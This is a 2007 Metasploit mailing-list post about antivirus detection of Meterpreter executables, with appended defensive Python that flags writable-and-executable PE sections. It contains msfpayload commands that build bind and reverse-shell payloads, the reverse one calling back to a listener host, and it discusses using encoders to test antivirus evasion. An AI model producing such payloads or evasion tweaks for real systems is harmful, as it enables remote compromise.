Metasploit mailing list archives
Connect to a remote windows host with valid credentials (no exploit)
From: mmiller at hick.org (mmiller at hick.org)
Date: Fri, 1 Jun 2007 13:32:17 -0700
On Fri, Jun 01, 2007 at 03:13:01PM -0500, Kurt Grutzmacher wrote:
> On Fri, Jun 01, 2007 at 04:50:23PM +0200, Nicolas FR wrote:
> > - Kaspersky 6.0 detects the payload and blocks the .exe when the exploit is
> >   launched (warning about "Buffer Overflow"); Kaspersky does a good job on
> >   this, I am positively surprised.
>
> I made a meterpreter listener and reverse and uploaded them to virustotal.com:
>
>   $ ./msfpayload windows/meterpreter/bind_tcp LPORT=5512 X > metbind-5512.exe
>   $ ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.221.55.2 LPORT=5512 X > metreverse-5512.exe
>
> Only three found them suspicious, Fortinet 2.85.0.0, Panda 9.0.0.4 and
> Webwasher-Gateway 6.0.1 .. That could change in the future. Symantec 10 used
> to complain, not sure what changed. :)
>
> If only a clean EXE would be created with a real exit() call or something.
> Having the debug handler kick in after doing a 'quit' really sucks.
I committed a change to trunk to allow you to specify an encoder through the ENCODER option on the command line (case sensitive). You might try generating an executable using an encoder and see what AVs come back with. The only problem will be that a number of the encoders assume the ability to do in-place decoding which won't work with the current executable template (because the code section is readonly). It might be possible for us to modify the template to have the code section be mapped execute/read/write. I wonder if AV flags that as suspicious :)
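The closing question above, whether a template whose code section is mapped execute/read/write would look suspicious, is a property a scanner or triage script can read straight from the PE section table. The following Python is an added example, not code from this list or from Metasploit: it parses the section headers of a PE image and reports any section whose characteristics are both writable and executable. The flag constants are the documented PE/COFF values; the two headers it builds are constructed samples, not real binaries.

```python
import struct

# Section characteristics flags from the PE/COFF specification.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def section_permissions(pe: bytes):
    """Return [(name, characteristics, is_wx)] for each section header in a PE."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                          # start of the 20-byte COFF header
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size                 # section table follows the optional header
    result = []
    for i in range(num_sections):
        hdr = pe[table + i * 40:table + (i + 1) * 40]   # each section header is 40 bytes
        name = hdr[:8].rstrip(b"\0").decode("ascii", "replace")
        chars = struct.unpack_from("<I", hdr, 36)[0]    # Characteristics is the last field
        is_wx = bool(chars & IMAGE_SCN_MEM_EXECUTE) and bool(chars & IMAGE_SCN_MEM_WRITE)
        result.append((name, chars, is_wx))
    return result


def wx_sections(pe: bytes):
    """Names of sections mapped both writable and executable (the RWX template case)."""
    return [name for name, _, is_wx in section_permissions(pe) if is_wx]


def build_test_pe(sections):
    """Constructed sample: a bare PE header with the given (name, characteristics) sections."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)        # e_lfanew: PE signature right after the DOS header
    # Machine=i386, NumberOfSections, timestamp, symtab ptr, nsyms, SizeOfOptionalHeader=0, flags
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    table = b"".join(struct.pack("<8s6IHHI", n.encode(), 0, 0, 0, 0, 0, 0, 0, 0, c)
                     for n, c in sections)
    return bytes(dos) + b"PE\0\0" + coff + table


# Constructed samples: a conventional RX/RW layout and an in-place-decoding RWX layout.
NORMAL_PE = build_test_pe([(".text", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE),
                           (".data", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)])
RWX_PE = build_test_pe([(".text", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE)])
```

Run against a real file with `wx_sections(open(path, "rb").read())`; the samples above omit the optional header, which the parser skips via SizeOfOptionalHeader, so real images parse the same way.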